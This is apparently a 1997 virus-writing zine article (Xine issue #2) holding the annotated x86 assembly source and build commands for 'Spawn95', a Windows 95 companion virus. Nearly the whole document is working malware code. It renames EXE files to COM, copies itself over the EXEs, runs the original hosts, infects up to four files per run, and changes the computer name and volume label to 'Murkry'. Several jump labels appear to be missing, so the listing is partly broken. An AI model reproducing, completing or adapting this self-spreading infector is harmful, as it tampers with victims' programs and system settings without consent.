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| Xine - issue #2 - Phile 023 |
; simple win 95 spawning virus
; use CreateProccessA to run the exe so as long as its in
; win95 it could load the win 3.1 and Dos files
; It renames the EXE to Com this means that at the Dos prompt the true
; file will be run but at the Windows GUI interface the exe file which is the
; virus will run it will search for 2 possibles files and infect 1 file if
; possible.
; First virus I have written an early version of it was release and got to
; AVP where it was called Win95.Companion.
; I knew I should have put a name in it ;) so Spawn95 it is version 1.1
;notes this is a spawning Win32 virus that uses the kernel API's to
;call the orginal host and to find the host Does not change directories
;so it should be relatively harmless. Will not work from the command line
;cause thats like DOS so the .com file(orginal file will be called)
;but for the Windows only people it will work like a charm of course
;it cant spread to far and if it does (shock) I'll wonder how it did.
; Why write a Companion virus at all , hell ask why write viruses,
; no reason at all...
;can't wait for
;doppelganger97 <g>
; To compile:
; tasm32 /ml /m3 spawn95b,,;
; tlink32 /Tpe /aa /c spawn95b,spawn95b,, import32.lib
.model flat
Find_data equ 139h
Find_data_name equ 2ch ;where in the structure is the name
;Define the needed external functions and constants here.
extrn ExitProcess:PROC
extrn FindFirstFileA:PROC
extrn CopyFileA:PROC
extrn GetCommandLineA:PROC
extrn FindNextFileA:Proc
extrn lstrcpyA:PROC
extrn MessageBoxA:PROC
extrn CreateProcessA:PROC ;used to run the host
extrn SetComputerNameA:PROC
extrn SetVolumeLabelA:PROC
.data ;the data area
EXE_file DB '*'
Fexe dB '.EXE',0
Fcom db '.COM',0
blank db ' ',0
title1 db 'Spawn95',0
mess db 'Either 4 or all files in this directory ',0dh
db ' are infected!!!',0dh
db 0dh
db "'Making computers more interesting ",0dh
db "Through the creation of `tronic life'",0dh
db ' Murkry/1997',0
murkry db 'Murkry',0
FileHandH dd ?
fileHandV DD ?
DW ?
DW ?
DW ?
DW ?
DB 14D DUP(?)
counter db ?
Fhandle dd ?
find_file db Find_data dup(?) ;size of the find data
new_name db 0FH dup(?)
host_name db 100 dup(?)
inf_name db 100 dup(?)
ProcessInfo DD 4 dup(?)
StartupInfo DD 18 dup(?)
buffer db 1024 dup (?)
.code ;executable code starts here
; returns in eax pointer to the command line appears that
; ecx also returns something but not sure what 05 a handle maybe
Call GetCommandLineA ;nothing pass to it
;eax ->command line
push eax ;What to copy pointer
mov eax,offset host_name ;to where we want it
push eax ;
call lstrcpyA ;this copys the string
call FindDot
;convert the name to the
mov esi,offset Fcom ;com name which is the
mov ecx,5 ;host_name
rep movsb ;
mov eax,offset host_name ;have no idea why I did
push eax ;not just copy the command
mov eax,offset inf_name ;line twices and throw the
push eax ;zero on the end
call lstrcpyA ;inf_name is the name
;of the exe companion
call FindDot ;
mov esi,offset Fexe ;
mov ecx,5 ;
rep movsb ;
;We now have the host name *.com in host name now we need to find a exe file
;that has no *.com file associated with it
call RunIt ;run the host_name file
;The host has been run now the Spawn simply needs to find another host
;and rename and copy itself to the old name
;handle FindFirst(LPSTR lpszSearchFile, LPWIN32_FIND_DATA lpffd)
mov eax, OFFSET find_file
push eax
mov eax, OFFSET EXE_file
push eax
call FindFirstFileA
cmp EAX, -1 ;cant find exe file
je fini
mov [Fhandle],eax ;save the handle
;ok we have a file now create the new name *.com
;just do a move until the . is found then add the .com to it
; movsb ds:esi -> es:edi
; lodsb ds:esi -> al
; stosb al -> es:edi
inc byte ptr [counter]
push ds ;
pop es ;take the name we
mov edi,offset new_name ;found and
mov esi,offset find_file + Find_data_name ;make it a com name
mov ah,"." ;
loop_search: ;
lodsb ;
cmp ah,al ;
je FoundIt ;
stosb ;
jmp loop_search ;
FoundIt: ;
mov esi,offset Fcom ;
mov ecx,5 ;
rep movsb ;
; Should pobaly use the MoveFile API to just rename the file
; but too lazy to change the code now and how much time would you
; want to waste on a spawning virus anyway ???
;CopyFileA(dword pnter file_name, dword pnter new_name, T/F Bool)
; 1 = true 0 = false True means do not overwrite
mov eax,1 ;do not overwrite
push eax ;
mov eax,offset new_name ;new name
push eax
mov eax,offset find_file + Find_data_name ;old name
push eax
call CopyFileA
cmp eax,0 ;0 = false we failed so get out
jne OkInfectHost
cmp [counter],4
je DoneInfecting
Call Fnext
cmp eax,0 ;0 failed search end it
je DoneInfecting
jmp FoundAFile
;CopyFileA(dword pnter file_name, dword pnter new_name, T/F Bool)
; 1 = true 0 = false True means do not overwrite
mov eax,0
push eax
mov eax,offset find_file + Find_data_name ;old name to copy to
push eax
mov eax,offset inf_name + 1 ;the old host
push eax
call CopyFileA
;I had some vaporware ideas to copy the .resc area of the PE exe files
;from the orginal host to the companion this way the icon info would show
;up but Started toplay with the Win32 vxd service which allows Int 21 31 41
;calls from the Win32 program. Seems it be fun to write a virus that
;only uses the callvxd0 API from the Kernel to infect a file
;Mite be harder to catch also :)
;anyway here where the quick notes I had written to myself
;inf_name = the new name of us
;new_name = orginal host
;open new_name copy rscr section entry
; copy rscr entry
; close file
;open inf_name
;write rscr entry to end
;read in the PE header
;update the num_sections 6 word
; size of data 28 D ????
; size of image 80 D
; rscr header update pointer to raw data
; this will be old image sizeenryt + 14h
;will need FPointer, Fread, Fwrite
push LARGE -1
call ExitProcess ;end it
mov eax,offset murkry ;sets the computer name to
push eax ;Murkry
push eax ;
call SetComputerNameA ;
xor eax,eax
push eax
call SetVolumeLabelA ;sets the volume name to murkry
jmp End_it
mov edi,eax
mov al,"."
cmp al,byte ptr [edi]
je found_dot
inc edi
jmp search_for
;bool FindNextFileA( handle, pointer Find_Data)
mov eax,offset find_file
push eax
mov eax,[Fhandle]
push eax
call FindNextFileA
mov eax, offset ProcessInfo
push eax
mov eax, offset StartupInfo
push eax
mov eax,0 ;null current dir
push eax
push eax ;null enviroment
push 10h ;creat_new_console creatflags
push eax ;False = 0 inherit handles
push eax ;null thread security
push eax ;null process security
mov eax,offset blank ;command line
push eax
mov eax,offset host_name + 1 ;file to run
push eax
Call CreateProcessA
; on the other hand why bother
mov eax, -1
push eax
mov eax,offset title1
push eax ;
mov eax,offset mess ;find_file + Find_data_name
push eax ;
mov eax,0
push eax
call MessageBoxA
end HOST